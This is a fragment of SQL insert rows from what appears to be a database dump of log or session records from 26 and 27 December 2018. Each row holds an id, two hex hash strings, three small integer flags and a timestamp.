(42811, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-26 17:32:29'),
(42812, '924ae391e350eb28e578bc8093b262de', 'e216e7808556cb4e', 0, 2, 1, '2018-12-26 17:33:26'),
(42813, 'c6cc72bf21d9bc7a703b12e15c5e271c', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-26 17:37:31'),
(42814, '0c6800e8d75f647b7f7601414d21e81a', '8a144e5fc2e94311', 0, 2, 1, '2018-12-26 17:38:57'),
(42815, 'd851c86587fdf038522acc0e93919849', 'd9500931744bb85f', 0, 2, 1, '2018-12-26 17:39:24'),
(42816, '8b0db6775df8caa19110feedbe0e20df', '32b169e936bbe5df', 0, 2, 1, '2018-12-26 17:39:46'),
(42817, 'c16bc7c1c5c313d5d4892b0f7bfbc53a', 'eef7e30932379c53', 0, 2, 1, '2018-12-26 17:40:01'),
(42818, '6d6cc6ebc9a185352f6b8dc1ee20714a', '049dbeed11095c77', 0, 2, 1, '2018-12-26 17:40:57'),
(42819, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2018-12-26 17:44:36'),
(42820, '5f00f2bd2b52e2b60cf9b54378c84246', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-26 17:45:10'),
(42821, '44c37dbc97b10c53b67cfc804497eef4', '6b1042c4ce456b1b', 0, 2, 1, '2018-12-26 17:48:14'),
(42822, '8447bc7015bce0ab56472154b9024913', '9968c5be4a7971a2', 0, 2, 1, '2018-12-26 17:51:18'),
(42823, '02a1b251d117e6cc8cb0314a48da345b', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-26 17:52:14'),
(42824, '02a1b251d117e6cc8cb0314a48da345b', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-26 17:52:31'),
(42825, '02a1b251d117e6cc8cb0314a48da345b', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-26 17:52:57'),
(42826, '02a1b251d117e6cc8cb0314a48da345b', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-26 17:53:11'),
(42827, '6eefcb9ea8aeb98e686b3c3e934d7cbe', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-26 17:53:13'),
(42828, '02a1b251d117e6cc8cb0314a48da345b', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-26 17:53:47'),
(42829, '77431a6d09cea635401382ac9cc128ce', 'bd73e20714ee5dc2', 0, 2, 1, '2018-12-26 17:54:36'),
(42830, '5f2fbe80bfab72bbc213b07ea624ecf3', '101317224b4423da', 0, 2, 1, '2018-12-26 17:58:00'),
(42831, '2cbad1ae38bf94b1cec169a563fab5a7', '6148fb9d2849eccf', 0, 2, 1, '2018-12-26 17:59:17'),
(42832, '36b3b85b1847a94432e1281c8bcbadda', '3980136eb82f67c3', 0, 2, 1, '2018-12-26 18:01:07'),
(42833, '39cdf1751294748a5951bbd1438c6743', '02ee6768142e877d', 0, 2, 1, '2018-12-26 18:01:34'),
(42834, '36b3b85b1847a94432e1281c8bcbadda', '3980136eb82f67c3', 0, 2, 1, '2018-12-26 18:01:57'),
(42835, '0d246d9a81c685364e3414a3bb6e6d58', '40806105cf650d8d', 0, 2, 1, '2018-12-26 18:05:26'),
(42836, '41c066c8b364f374b391a49faac30e8c', '73ede49b89f34e28', 0, 2, 1, '2018-12-26 18:06:36'),
(42837, '0c6800e8d75f647b7f7601414d21e81a', '8a144e5fc2e94311', 0, 2, 1, '2018-12-26 18:07:17'),
(42838, '41c066c8b364f374b391a49faac30e8c', '73ede49b89f34e28', 0, 2, 1, '2018-12-26 18:08:36'),
(42839, 'ae8d93355c7a018c9e5d6aee3a99ed32', 'c996d3f4a66c1d4b', 0, 2, 1, '2018-12-26 18:10:14'),
(42840, '8b0db6775df8caa19110feedbe0e20df', '32b169e936bbe5df', 0, 2, 1, '2018-12-26 18:10:20'),
(42841, '5f2fbe80bfab72bbc213b07ea624ecf3', '101317224b4423da', 0, 2, 1, '2018-12-26 18:12:36'),
(42842, '36b3b85b1847a94432e1281c8bcbadda', '3980136eb82f67c3', 0, 2, 1, '2018-12-26 18:17:11'),
(42843, '87c4595752a3869bf1c3fa9f0bb2b333', '6711272a62e81edf', 0, 2, 1, '2018-12-26 18:20:48'),
(42844, '7f9e4f4a0fe324d1e4a79a3bf29d6493', '3233431a244017cd', 0, 2, 1, '2018-12-26 18:21:46'),
(42845, '7f9e4f4a0fe324d1e4a79a3bf29d6493', '3233431a244017cd', 0, 2, 1, '2018-12-26 18:22:00'),
(42846, '26b7051f8e6d0432206cb8bae6c501f4', '15fdd013f34287ab', 0, 2, 1, '2018-12-26 18:22:32'),
(42847, '98d05b16608a5287d81084298c7bbdf1', '7e5e2cbf6cf0dac1', 0, 2, 1, '2018-12-26 18:22:39'),
(42848, '88d1cdd41e45d9332419f019fe580a34', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-26 18:22:51'),
(42849, '2b6e8f6fd475222ee4090155c72c522b', '2034f09284a4c7ca', 0, 2, 1, '2018-12-26 18:23:00'),
(42850, '87c4595752a3869bf1c3fa9f0bb2b333', '6711272a62e81edf', 0, 2, 1, '2018-12-26 18:23:11'),
(42851, '88d1cdd41e45d9332419f019fe580a34', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-26 18:23:12'),
(42852, 'a8ef5c9f62778948691cece85ce599da', '2fa458d0337a4355', 0, 2, 1, '2018-12-26 18:24:36'),
(42853, '6acd42fb9afba68d40568571ca9426b1', '0d3b5271c2ab69e3', 0, 2, 1, '2018-12-26 18:25:10'),
(42854, 'a8ef5c9f62778948691cece85ce599da', '2fa458d0337a4355', 0, 2, 1, '2018-12-26 18:25:14'),
(42855, '88d1cdd41e45d9332419f019fe580a34', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-26 18:25:19'),
(42856, '6acd42fb9afba68d40568571ca9426b1', '0d3b5271c2ab69e3', 0, 2, 1, '2018-12-26 18:25:33'),
(42857, 'b232407746a5f20ccc3c330139c44c50', '679c2311f97bf8cf', 0, 2, 1, '2018-12-26 18:25:54'),
(42858, '0c6800e8d75f647b7f7601414d21e81a', '8a144e5fc2e94311', 0, 2, 1, '2018-12-26 18:26:30'),
(42859, '36b3b85b1847a94432e1281c8bcbadda', '3980136eb82f67c3', 0, 2, 1, '2018-12-26 18:26:59'),
(42860, 'b232407746a5f20ccc3c330139c44c50', '679c2311f97bf8cf', 0, 2, 1, '2018-12-26 18:27:43'),
(42861, '924101ad49336307d5c8ea7b472b725c', 'e09d4686dc7ae3f7', 0, 2, 1, '2018-12-26 18:29:41'),
(42862, '2b6e8f6fd475222ee4090155c72c522b', '2034f09284a4c7ca', 0, 2, 1, '2018-12-26 18:30:11'),
(42863, 'baa1e194f6df6ab9c19e82b71f449cbc', '27d3b62cdd82d36e', 0, 2, 1, '2018-12-26 18:33:10'),
(42864, '027da1029b1f390413d5682a3c9d941a', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-26 18:33:48'),
(42865, '98d05b16608a5287d81084298c7bbdf1', '7e5e2cbf6cf0dac1', 0, 2, 1, '2018-12-26 18:35:52'),
(42866, '6eefcb9ea8aeb98e686b3c3e934d7cbe', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-26 18:36:45'),
(42867, '12ceca9af0fe9afe949483fe80f3b732', '9ce6f87eed9d7b6a', 0, 2, 1, '2018-12-26 18:37:52'),
(42868, '8b0db6775df8caa19110feedbe0e20df', '32b169e936bbe5df', 0, 2, 1, '2018-12-26 18:38:59'),
(42869, '3fc37e107d75fc1f76363307ae365527', '7501b42c35accff7', 0, 2, 1, '2018-12-26 18:39:08'),
(42870, '2732ab0a98dddf77602a231459ed455a', '113a26d6adf3f967', 0, 2, 1, '2018-12-26 18:41:57'),
(42871, '8b0db6775df8caa19110feedbe0e20df', '32b169e936bbe5df', 0, 2, 1, '2018-12-26 18:43:58'),
(42872, '165ee05ac6da5e2d2e4c379a44d7e66a', '21a75882f832ae93', 0, 2, 1, '2018-12-26 18:44:17'),
(42873, '123a84e2fd89b621de36a3eb321837f0', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-26 18:48:43'),
(42874, 'ae8d93355c7a018c9e5d6aee3a99ed32', 'c996d3f4a66c1d4b', 0, 2, 1, '2018-12-26 18:52:57'),
(42875, '34b142c9485e1fb2e82073e12203e592', '417b807dff7c6249', 0, 2, 1, '2018-12-26 18:53:28'),
(42876, '7f9e4f4a0fe324d1e4a79a3bf29d6493', '3233431a244017cd', 0, 2, 1, '2018-12-26 18:54:05'),
(42877, '7f9e4f4a0fe324d1e4a79a3bf29d6493', '3233431a244017cd', 0, 2, 1, '2018-12-26 18:54:17'),
(42878, '55eb56ed4ce872c08452a0fc472e9134', '29608a328df169fa', 0, 2, 1, '2018-12-26 18:54:39'),
(42879, '36b3b85b1847a94432e1281c8bcbadda', '3980136eb82f67c3', 0, 2, 1, '2018-12-26 18:55:40'),
(42880, 'da3aca98ff5318dbc6bd34f2710ab3fc', '1f14c7d5497f1160', 0, 2, 1, '2018-12-26 18:56:01'),
(42881, '55eb56ed4ce872c08452a0fc472e9134', '29608a328df169fa', 0, 2, 1, '2018-12-26 18:59:02'),
(42882, '949f26b8224a699757df8a8aa64deaa0', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-26 19:00:37'),
(42883, '55eb56ed4ce872c08452a0fc472e9134', '29608a328df169fa', 0, 2, 1, '2018-12-26 19:01:40'),
(42884, 'ad7a8c87f60bfea97de0f0139adccb4c', 'c020abbb40884763', 0, 2, 1, '2018-12-26 19:02:50'),
(42885, 'ad7a8c87f60bfea97de0f0139adccb4c', 'c020abbb40884763', 0, 2, 1, '2018-12-26 19:03:44'),
(42886, 'fc499c944c6f6e0fd2ee1408c5905054', '6092d6c1cb041b23', 0, 2, 1, '2018-12-26 19:04:00'),
(42887, '5f2fbe80bfab72bbc213b07ea624ecf3', '101317224b4423da', 0, 2, 1, '2018-12-26 19:04:25'),
(42888, '8e7649606de8f11382b79fca78b18aae', '520adb721b859f37', 0, 2, 1, '2018-12-26 19:08:54'),
(42889, '7f9e4f4a0fe324d1e4a79a3bf29d6493', '3233431a244017cd', 0, 2, 1, '2018-12-26 19:10:31'),
(42890, '7f9e4f4a0fe324d1e4a79a3bf29d6493', '3233431a244017cd', 0, 2, 1, '2018-12-26 19:12:11'),
(42891, '92d447cc0594bbbe92e014b926f1fbe0', 'c0d620ee8725a926', 0, 2, 1, '2018-12-26 19:13:17'),
(42892, '92d447cc0594bbbe92e014b926f1fbe0', 'c0d620ee8725a926', 0, 2, 1, '2018-12-26 19:14:54'),
(42893, '858539fd036ff815709da2f039280b39', '00a1e8daf077053f', 0, 2, 1, '2018-12-26 19:26:02'),
(42894, '858539fd036ff815709da2f039280b39', '00a1e8daf077053f', 0, 2, 1, '2018-12-26 19:26:11'),
(42895, '125c028fcfce1573310ef95f86b764c5', '25da2c9cf79597e0', 0, 2, 1, '2018-12-26 19:56:07'),
(42896, 'd0ab17c2fb2e73d929470e75192a0c14', '8fa562d77d157253', 0, 2, 1, '2018-12-26 19:56:08'),
(42897, '7f9e4f4a0fe324d1e4a79a3bf29d6493', '3233431a244017cd', 0, 2, 1, '2018-12-26 20:48:02'),
(42898, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-26 20:57:49'),
(42899, '3cfa46376e97e1832ac07392d8c11d6c', '40594da3f8853294', 0, 2, 1, '2018-12-26 21:12:09'),
(42900, 'c35107f9e6f8ffd42b2432ec3804745d', 'ee048a80ed202af2', 0, 2, 1, '2018-12-26 21:29:07'),
(42901, 'd14cd40b68cf7d6b7e0a28a882f96a43', '19f4fe812e513231', 0, 2, 1, '2018-12-26 22:08:25'),
(42902, '0c57d092ca2260938876d1fe1263a0f7', '362f871a2039351c', 0, 2, 1, '2018-12-26 22:33:20'),
(42903, '70c2258b548e553211e2dfc8c66df059', '6e1b2418cd53fdf4', 0, 2, 1, '2018-12-26 22:52:34'),
(42904, '97f7b694ddb20c9d9ee083f017a76280', 'eaa42057af8303d1', 0, 2, 1, '2018-12-26 23:15:33'),
(42905, '4386a27c29a70eb5779aec545d908c83', '26d132910332203a', 0, 2, 1, '2018-12-26 23:21:12'),
(42906, 'dc8f0fdb00fcd19fafe6f738ae3ab9ba', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-27 00:05:07'),
(42907, '9f734f5a673eb56f3ed41235e3f50af3', '2069e07e9a605a8f', 0, 2, 1, '2018-12-27 00:25:01'),
(42908, 'cdcf43f56eafcc3860dbe8937e0c5847', '913d5192bb92e532', 0, 2, 1, '2018-12-27 01:57:43'),
(42909, '589fba258eba6023d4b37ab39a2ea533', 'f51370cb5d4c2f6c', 0, 2, 1, '2018-12-27 02:49:02'),
(42910, '589fba258eba6023d4b37ab39a2ea533', 'f51370cb5d4c2f6c', 0, 2, 1, '2018-12-27 02:49:13'),
(42911, '6048408f95aeb8e7d4c00dfbbe82d5fb', 'fac7e250e11be10a', 0, 2, 1, '2018-12-27 03:13:12'),
(42912, '24754f487c84bbaaf40fb6f08849a516', 'ef6156a3302fba73', 0, 2, 1, '2018-12-27 03:32:55'),
(42913, 'a0675b390ca68aa925be1b338f7ada3c', 'f51370cb5d4c2f6c', 0, 2, 1, '2018-12-27 03:57:35'),
(42914, '90e94b36e392ecdf5b1c0398e0554e4f', '988d2e6c6617670d', 0, 2, 1, '2018-12-27 03:57:50'),
(42915, '51080c586e7b399879568f58fecf65f7', '2588c66d67e3b069', 0, 2, 1, '2018-12-27 03:58:05'),
(42916, 'ff2f8dd4c0e255b9677dd649a9bfd3a1', 'c571fd3fc7925ebc', 0, 2, 1, '2018-12-27 04:07:38'),
(42917, 'ec45ed5644e598338564054c7ef52aed', '4d9e8594d56452a5', 0, 2, 1, '2018-12-27 04:08:09'),
(42918, 'dc8f0fdb00fcd19fafe6f738ae3ab9ba', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-27 04:09:54'),
(42919, 'dc8f0fdb00fcd19fafe6f738ae3ab9ba', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-27 04:10:40'),
(42920, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 04:14:04'),
(42921, 'c35e4caeeb68bc741328458b03d06494', '198f92b82b53f9dc', 0, 2, 1, '2018-12-27 04:15:29'),
(42922, 'c35e4caeeb68bc741328458b03d06494', '198f92b82b53f9dc', 0, 2, 1, '2018-12-27 04:15:59'),
(42923, 'c35e4caeeb68bc741328458b03d06494', '198f92b82b53f9dc', 0, 2, 1, '2018-12-27 04:17:38'),
(42924, '24754f487c84bbaaf40fb6f08849a516', 'ef6156a3302fba73', 0, 2, 1, '2018-12-27 04:30:29'),
(42925, 'd32f603c7bd1236e82c33c13065bcb75', '9aed8b2d1a86f079', 0, 2, 1, '2018-12-27 04:41:53'),
(42926, 'd32f603c7bd1236e82c33c13065bcb75', '9aed8b2d1a86f079', 0, 2, 1, '2018-12-27 04:42:41'),
(42927, 'f88fdb9367390e8b16838ec396846565', 'fbf0576065758144', 0, 2, 1, '2018-12-27 04:54:33'),
(42928, 'f88fdb9367390e8b16838ec396846565', 'fbf0576065758144', 0, 2, 1, '2018-12-27 04:54:56'),
(42929, '4f62555a090122194eac8637a12d4aaa', '3f98f03a1028cbdf', 0, 2, 1, '2018-12-27 04:55:11'),
(42930, '18a577ae41d7c70dd71fe39e6eb261a7', 'b0d114cedc57cf48', 0, 2, 1, '2018-12-27 05:15:54'),
(42931, '6187cf7ad9c1f315e7c3b927fa7a2a01', '60475de5ad8741e8', 0, 2, 1, '2018-12-27 05:55:55'),
(42932, 'f330862dde68237ff94c25f813402ad3', 'ba32395289361d31', 0, 2, 1, '2018-12-27 06:02:53'),
(42933, 'f330862dde68237ff94c25f813402ad3', 'ba32395289361d31', 0, 2, 1, '2018-12-27 06:03:37'),
(42934, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 06:06:27'),
(42935, 'b003aef693490c225fae9a11d7a729b8', '2e8509a8523a933d', 0, 2, 1, '2018-12-27 06:43:35'),
(42936, 'b003aef693490c225fae9a11d7a729b8', '2e8509a8523a933d', 0, 2, 1, '2018-12-27 06:45:04'),
(42937, '76ab11612ba1d2930f46231e2afb90eb', 'eb7808097a0efe68', 0, 2, 1, '2018-12-27 06:54:08'),
(42938, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 07:03:31'),
(42939, 'a6c1034b9399275c809860e05e13e2f5', 'eb1b005791ec02af', 0, 2, 1, '2018-12-27 07:11:43'),
(42940, 'f8ae0d49ac5268813b4252b527ca7ffb', 'ef6156a3302fba73', 0, 2, 1, '2018-12-27 07:16:58'),
(42941, '6f1ec59387c20f330a3d4c22b3a37efa', '73ee6a1fddce93fe', 0, 2, 1, '2018-12-27 07:44:43'),
(42942, '9c58b6f7e512c13494b0d2f2ae8b0e17', '1817db6097b5ebde', 0, 2, 1, '2018-12-27 07:55:19'),
(42943, 'f6b1b0d371013178e886c2a5fd1b4560', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-27 08:31:28'),
(42944, '5335b8e4539dd7683c06f2cc6a59fde6', '0eb92567fec29a8e', 0, 2, 1, '2018-12-27 08:49:25'),
(42945, '45ffdb8b5bfa85abb46ab1b6fcb855e5', '4c5ae401da38b4ee', 0, 2, 1, '2018-12-27 08:49:27'),
(42946, 'e29cd894332cc2859383d6c30a18cc1d', '4d1d3099946c5f7b', 0, 2, 1, '2018-12-27 08:57:37'),
(42947, '407ade3aed9bc6269d8fea5629f9cb48', '60858333727ac7ce', 0, 2, 1, '2018-12-27 09:01:15'),
(42948, 'a34b64b3d0a6cb2b4ad1bea7ced7b88d', 'd00779b05c710e17', 0, 2, 1, '2018-12-27 09:05:44'),
(42949, '1a4ffb9b91483a0e9619f40d180de067', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-27 09:14:59'),
(42950, '1a4ffb9b91483a0e9619f40d180de067', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-27 09:15:40'),
(42951, '85d4e7ae3392cf9f130d8bf6e83f44c4', '23d65d55057a599a', 0, 2, 1, '2018-12-27 09:28:24'),
(42952, '408b22061787030c5a4de7f6d1045192', '51df446c19685386', 0, 2, 1, '2018-12-27 09:30:57'),
(42953, '408b22061787030c5a4de7f6d1045192', '51df446c19685386', 0, 2, 1, '2018-12-27 09:44:34'),
(42954, '91eb74aa746e54d8abf2dbef85200bcf', 'ca837d8711916131', 0, 2, 1, '2018-12-27 10:00:27'),
(42955, 'e54b42af6ec35f348debbcd8f303577d', 'ab15fd11e2218e3f', 0, 2, 1, '2018-12-27 10:10:20'),
(42956, '7c1a2afa76805287be2abe9e55b84a00', '8cc4c7dcf394f8aa', 0, 2, 1, '2018-12-27 10:11:21'),
(42957, '32d2d449287e628d4446ca6874b58d4a', 'c4eb1be463e017d1', 0, 2, 1, '2018-12-27 10:22:06'),
(42958, '233fc05945c46206d7a04ea51d83db47', 'cad202a09758cb3a', 0, 2, 1, '2018-12-27 10:24:03'),
(42959, 'c60e97079ac5dcfa654c4df7b4e7d075', '6654819fcce7bdc1', 0, 2, 1, '2018-12-27 10:52:13'),
(42960, 'e56aec5065899f297472c2568e23b307', '9179cabd0c59a713', 0, 2, 1, '2018-12-27 10:58:22'),
(42961, 'b2d276d034a612ccfea8883d314a0ef1', 'd13ec5d7dc97d30b', 0, 2, 1, '2018-12-27 11:03:16'),
(42962, '3ef4653bb6f45dffc7ee0362bdaeefb2', 'e6d68f41a23e8fb4', 0, 2, 1, '2018-12-27 11:07:17'),
(42963, '8d5477aa018159a4942e91d31fa04d87', '50bfd2e2b38a86b4', 0, 2, 1, '2018-12-27 11:16:24'),
(42964, 'dc52fc2c07fb9db9e0cebc2046a4b5b1', '70b21cb878575bb6', 0, 2, 1, '2018-12-27 11:21:58'),
(42965, '64e889cee3565b13ea4cd05751a3ca56', '9e6c4eb85b624b69', 0, 2, 1, '2018-12-27 12:00:36'),
(42966, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 12:01:25'),
(42967, 'bb21260831063047a25ba77223711870', '1edea6f5c2ca8b32', 0, 2, 1, '2018-12-27 12:01:37'),
(42968, '175d8e0ad33812237bf7285ae67c3e6d', '5fda6c59218e0c14', 0, 2, 1, '2018-12-27 12:10:58'),
(42969, '175d8e0ad33812237bf7285ae67c3e6d', '5fda6c59218e0c14', 0, 2, 1, '2018-12-27 12:12:17'),
(42970, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 12:14:22'),
(42971, 'a061e618230fd25f1d56f90e7a0524b7', '986ab564e02c3805', 0, 2, 1, '2018-12-27 12:27:15'),
(42972, '431b3903ad347052a2cf6a74fcac88ad', 'e3f901a76890f092', 0, 2, 1, '2018-12-27 12:27:44'),
(42973, '5e8349f4aa2b734d8d826134fd1bc1c0', 'c5e6f9b672126876', 0, 2, 1, '2018-12-27 12:31:40'),
(42974, '1798df940264abbbb4c55315812e674e', '1754fdbd39876e7c', 0, 2, 1, '2018-12-27 12:34:18'),
(42975, '6d6de4ee5ba60332f34b43f96e2c852c', '4d1df6a9b11b2d30', 0, 2, 1, '2018-12-27 12:39:21'),
(42976, 'e810390436d197422f0502104810a007', '67c1e441756481e3', 0, 2, 1, '2018-12-27 13:28:37'),
(42977, 'a919485cdca02244080c3045a59cde10', '3ba3484de462963c', 0, 2, 1, '2018-12-27 13:29:35'),
(42978, 'a919485cdca02244080c3045a59cde10', '3ba3484de462963c', 0, 2, 1, '2018-12-27 13:31:27'),
(42979, '3ef4b8db9bfe6e43ccce9b70cceea109', '04feaa6d6173de6a', 0, 2, 1, '2018-12-27 13:37:16'),
(42980, '0da045f39f8873841614e92a435b9a73', '9b614211e032edb2', 0, 2, 1, '2018-12-27 13:38:11'),
(42981, '3b896b8b967fcce7adeba823863f4202', 'c9482a32ed21b904', 0, 2, 1, '2018-12-27 13:47:36'),
(42982, 'b81946dc3aa2f6ff1b23baa4524df985', '71aaffc000bb3bae', 0, 2, 1, '2018-12-27 13:57:26'),
(42983, '879fe67b2ef450a07015eda185693d7b', '444f5dfc87a73f34', 0, 2, 1, '2018-12-27 14:00:31'),
(42984, 'b35cd7fbe1d5b596d1aedb4d637ea25a', '1bc026608655f6b0', 0, 2, 1, '2018-12-27 14:01:11'),
(42985, '7d13eb6c9844a5a49ad91ccbaf73872f', '67013421d92952a1', 0, 2, 1, '2018-12-27 14:15:47'),
(42986, 'c4b2e76706141b25b796ec6f826f0286', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-27 14:19:08'),
(42987, '6d6de4ee5ba60332f34b43f96e2c852c', '4d1df6a9b11b2d30', 0, 2, 1, '2018-12-27 14:19:49'),
(42988, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 14:22:47'),
(42989, 'c087b0446a04dccc39974055d5d650e5', 'b335903010e84d54', 0, 2, 1, '2018-12-27 14:22:50'),
(42990, 'c087b0446a04dccc39974055d5d650e5', 'b335903010e84d54', 0, 2, 1, '2018-12-27 14:23:21'),
(42991, 'a919485cdca02244080c3045a59cde10', '3ba3484de462963c', 0, 2, 1, '2018-12-27 14:50:32'),
(42992, '62cb436dbc544dc9f79e24771b3ad5f2', '911e3fc613971e2e', 0, 2, 1, '2018-12-27 15:19:38'),
(42993, 'a0e8c8a1ac3b646565527778ed3d64f4', '465db14add0d67dd', 0, 2, 1, '2018-12-27 15:20:28'),
(42994, 'b0456d69f5edee612ba9d2785fe17a37', 'f28c8d9e35a44906', 0, 2, 1, '2018-12-27 15:33:00'),
(42995, 'b0456d69f5edee612ba9d2785fe17a37', 'f28c8d9e35a44906', 0, 2, 1, '2018-12-27 15:33:14'),
(42996, '34fcf56e4e94b8e2aa380796448c34b4', 'b74810b2c2bb158b', 0, 2, 1, '2018-12-27 15:36:01'),
(42997, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 15:36:17'),
(42998, '688702864efebdafd3bd9e33d1d3fb0e', '6106751d25ddba21', 0, 2, 1, '2018-12-27 16:17:51'),
(42999, 'c365118f6f38f22a9d6f2d0a12563974', 'df6bc92e267e2807', 0, 2, 1, '2018-12-27 16:42:23'),
(43000, 'a9a15479ecabc005e45ae6a2334e9344', '60a50fbb62efd509', 0, 2, 1, '2018-12-27 17:30:28'),
(43001, 'a919485cdca02244080c3045a59cde10', '3ba3484de462963c', 0, 2, 1, '2018-12-27 17:38:15'),
(43002, 'fec5ce135df24538b4e0eedecda21a40', 'a1c852ac457f66f7', 0, 2, 1, '2018-12-27 17:43:49'),
(43003, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-27 18:11:54'),
(43004, '1165b0d2228a4f1894d9c6acb0d13906', '7aa4ad0c7004399a', 0, 2, 1, '2018-12-27 18:14:46'),
(43005, 'feabff738c61a0ecd8371a9e43855835', '641e8b0f1d1e6381', 0, 2, 1, '2018-12-27 18:53:36'),
(43006, 'feabff738c61a0ecd8371a9e43855835', '641e8b0f1d1e6381', 0, 2, 1, '2018-12-27 18:54:14'),
(43007, '184a8dae87220ee2545ba6d7a5041d9a', '354aff4e76611752', 0, 2, 1, '2018-12-27 19:06:16'),
(43008, '184a8dae87220ee2545ba6d7a5041d9a', '354aff4e76611752', 0, 2, 1, '2018-12-27 19:06:44'),
(43009, '184a8dae87220ee2545ba6d7a5041d9a', '354aff4e76611752', 0, 2, 1, '2018-12-27 19:07:20'),
(43010, '184a8dae87220ee2545ba6d7a5041d9a', '354aff4e76611752', 0, 2, 1, '2018-12-27 19:07:37'),
(43011, '184a8dae87220ee2545ba6d7a5041d9a', '354aff4e76611752', 0, 2, 1, '2018-12-27 19:07:57'),
(43012, '184a8dae87220ee2545ba6d7a5041d9a', '354aff4e76611752', 0, 2, 1, '2018-12-27 19:08:16'),
(43013, '184a8dae87220ee2545ba6d7a5041d9a', '354aff4e76611752', 0, 2, 1, '2018-12-27 19:08:42'),
(43014, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:14:43'),
(43015, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:18:10'),
(43016, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:18:24'),
(43017, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:18:48'),
(43018, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:18:57'),
(43019, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:19:04'),
(43020, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:19:12'),
(43021, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:19:42'),
(43022, 'f0cdb0bd656625dfdacb5106f89b1f5b', 'd9b99d1b3dc730a7', 0, 2, 1, '2018-12-27 19:19:58'),
(43023, '2f89845de39ecf0487ea21ae08f73875', '403c3d43e3223047', 0, 2, 1, '2018-12-27 20:01:50'),
(43024, '2f89845de39ecf0487ea21ae08f73875', '403c3d43e3223047', 0, 2, 1, '2018-12-27 20:03:34'),
(43025, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2018-12-27 20:11:18'),
(43026, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2018-12-27 20:11:51'),
(43027, '877c19378cf0b5fcd8107f3eacad280b', '79f449f0b1db13e8', 0, 2, 1, '2018-12-27 20:43:44'),
(43028, '471434f3dc913ac3cd2a7cb04b73f334', '8f13f1d2791e0244', 0, 2, 1, '2018-12-27 20:48:02'),
(43029, '98b42f63f16cb2759d5538f4af9d57db', '5fd46984da6363e6', 0, 2, 1, '2018-12-27 21:05:55'),
(43030, 'b41bcf9152a48e2df3538668b2954ced', '8fd26dbeeff0077b', 0, 2, 1, '2018-12-27 21:32:16'),
(43031, 'ccf856e9d8c535d9cf2be081d826da92', '97e2ae0019717d00', 0, 2, 1, '2018-12-27 21:43:35'),
(43032, 'c78232bbf0e7dffed93876ba22d1d4bb', 'fcddee45e7a95ba9', 0, 2, 1, '2018-12-27 21:43:36'),
(43033, 'ac0077886564130249d434795a352174', '8102de07893b3de4', 0, 2, 1, '2018-12-27 21:44:02'),
(43034, 'ed59415d05de63aaad52315eac2ec9ae', '39f42ca3d7ae6d0b', 0, 2, 1, '2018-12-27 21:44:29'),
(43035, '6721b1251df1fe65f946bf7e4bf7826d', 'cfa4339db983a80a', 0, 2, 1, '2018-12-27 21:56:42'),
(43036, '6521e110504e1c84c4674086fed1a2c1', 'b558f5b9b9ca2c94', 0, 2, 1, '2018-12-27 22:04:44'),
(43037, '6521e110504e1c84c4674086fed1a2c1', 'b558f5b9b9ca2c94', 0, 2, 1, '2018-12-27 22:07:27'),
(43038, 'e72e6b0c96e5574d1ca09568bd1ab58c', '9463ff04a3d14bb9', 0, 2, 1, '2018-12-27 22:15:27'),
